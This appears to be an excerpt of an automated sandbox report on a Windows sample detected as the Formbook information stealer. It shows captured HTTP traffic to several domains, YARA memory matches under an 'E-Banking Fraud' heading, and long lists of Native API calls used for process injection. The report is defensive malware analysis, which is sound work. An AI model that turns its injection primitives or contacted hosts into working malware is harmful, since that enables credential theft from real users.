        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: ddos-guard | Connection: close | Set-Cookie: __ddg1_=CA7302n0o7hNsgNbFqiI; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:10 GMT | Date: Tue, 27 Aug 2024 06:01:11 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 340 | Last-Modified: Tue, 29 May 2018 17:41:27 GMT | ETag: "154-56d5bbe607fc0" | Accept-Ranges: bytes | X-Frame-Options: SAMEORIGIN | Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: ddos-guard | Connection: close | Set-Cookie: __ddg1_=F0QVtNqKeWjLisP5NyP2; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:13 GMT | Date: Tue, 27 Aug 2024 06:01:13 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 738 | Last-Modified: Sun, 11 Jun 2023 21:19:31 GMT | ETag: "2e2-5fde1286ba692" | Accept-Ranges: bytes | X-Frame-Options: SAMEORIGIN | Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 27 Aug 2024 06:03:13 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: br | Content-Length: 12523 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 27 Aug 2024 06:03:16 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: br | Content-Length: 12523 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 27 Aug 2024 06:03:19 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: br | Content-Length: 12523 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 27 Aug 2024 06:04:29 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 27 Aug 2024 06:04:32 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 27 Aug 2024 06:04:35 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 27 Aug 2024 06:04:37 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Tue, 27 Aug 2024 06:04:43 GMT | Content-Type: text/html | Content-Length: 3971 | Connection: close | ETag: "6526681e-f83"
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Tue, 27 Aug 2024 06:04:46 GMT | Content-Type: text/html | Content-Length: 3971 | Connection: close | ETag: "6526681e-f83"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:04:49 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 
20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:04:51 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 
20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:04:58 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:00 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:03 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:06 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 34 36 0d 0a 3c 68 31 3e 52 65 6c 61 74 65 64 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 53 6f 72 72 79 2c 20 77 65 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 61 74 20 70 61 67 65 2e 3c 2f 70 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0
        Source: x.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
        Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknown HTTPS traffic detected: 199.103.62.205:443 -> 192.168.11.20:49840 version: TLS 1.2

        E-Banking Fraud

        Source: Yara match File source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_345434E0 NtCreateMutant,LdrInitializeThunk,3_2_345434E0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_34542D10
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_34542B90
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34544570 NtSuspendThread,3_2_34544570
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34544260 NtSetContextThread,3_2_34544260
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542C50 NtUnmapViewOfSection,3_2_34542C50
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542C10 NtOpenProcess,3_2_34542C10
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34543C30 NtOpenProcessToken,3_2_34543C30
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542C30 NtMapViewOfSection,3_2_34542C30
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542C20 NtSetInformationFile,3_2_34542C20
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542CD0 NtEnumerateKey,3_2_34542CD0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542CF0 NtDelayExecution,3_2_34542CF0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34543C90 NtOpenThread,3_2_34543C90
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542D50 NtWriteVirtualMemory,3_2_34542D50
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542DC0 NtAdjustPrivilegesToken,3_2_34542DC0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542DA0 NtReadVirtualMemory,3_2_34542DA0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542E50 NtCreateSection,3_2_34542E50
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542E00 NtQueueApcThread,3_2_34542E00
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542ED0 NtResumeThread,3_2_34542ED0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542EC0 NtQuerySection,3_2_34542EC0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542E80 NtCreateProcessEx,3_2_34542E80
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542EB0 NtProtectVirtualMemory,3_2_34542EB0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542F00 NtCreateFile,3_2_34542F00
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542F30 NtOpenDirectoryObject,3_2_34542F30
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542FB0 NtSetValueKey,3_2_34542FB0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_345438D0 NtGetContextThread,3_2_345438D0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_345429D0 NtWaitForSingleObject,3_2_345429D0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_345429F0 NtReadFile,3_2_345429F0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542A10 NtWriteFile,3_2_34542A10
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542AC0 NtEnumerateValueKey,3_2_34542AC0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542A80 NtClose,3_2_34542A80
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542AA0 NtQueryInformationFile,3_2_34542AA0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542B10 NtAllocateVirtualMemory,3_2_34542B10
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542B00 NtQueryValueKey,3_2_34542B00
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542B20 NtQueryInformationProcess,3_2_34542B20
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542BC0 NtQueryInformationToken,3_2_34542BC0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542BE0 NtQueryVirtualMemory,3_2_34542BE0
        Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_34542B80 NtCreateKey,3_2_34542B80
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03454260 NtSetContextThread,LdrInitializeThunk,5_2_03454260
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03454570 NtSuspendThread,LdrInitializeThunk,5_2_03454570
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_034534E0 NtCreateMutant,LdrInitializeThunk,5_2_034534E0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452B00 NtQueryValueKey,LdrInitializeThunk,5_2_03452B00
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03452B10
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_03452BC0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452B80 NtCreateKey,LdrInitializeThunk,5_2_03452B80
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03452B90
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452A10 NtWriteFile,LdrInitializeThunk,5_2_03452A10
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03452AC0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_03452A80 NtClose,LdrInitializeThunk,5_2_03452A80
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_034529F0 NtReadFile,LdrInitializeThunk,5_2_034529F0
        Source: C:\Windows\SysWOW64\cmdkey.exe Code function: 5_2_034538D0 NtGetContextThread,LdrInitializeThunk,5_2_034538D0
